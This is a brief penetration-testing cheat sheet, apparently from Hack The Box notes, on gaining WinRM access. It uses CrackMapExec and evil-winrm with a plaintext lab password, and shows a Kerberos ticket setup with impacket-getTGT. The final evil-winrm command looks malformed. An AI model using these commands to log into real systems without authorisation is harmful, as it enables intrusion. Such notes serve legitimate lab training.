๐Ÿ› ๏ธwinrm

CME

cme winrm manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'    

evil-winrm

  • simple connection

evil-winrm -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -i manager.htb
  • connection using kerberos

export KRB5CCNAME=user.ccache
# modify /etc/krb5.conf
โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/hack-the-box/machines]
โ””โ”€$ cat /etc/krb5.conf                                                                   
[libdefaults]
    default_realm = DOMAIN.LOCAL
    dns_lookup_realm = false
    dns_lookup_kdc = false
    forwardable = true
[realms]
    DOMAIN.LOCAL = {
        kdc = dc01.domain.local
        admin_server = dc01.domain.local
    }
[domain_realm]
    .domain.local = DOMAIN.LOCAL
    domain.local = DOMAIN.LOCAL
# Get ticket
impacket-getTGT domain/username:'Password' -dc-ip dc01.infiltrator.htb

evil-winrm -u 'user.ccache' -p  -i domain.local -r domain.local

Last updated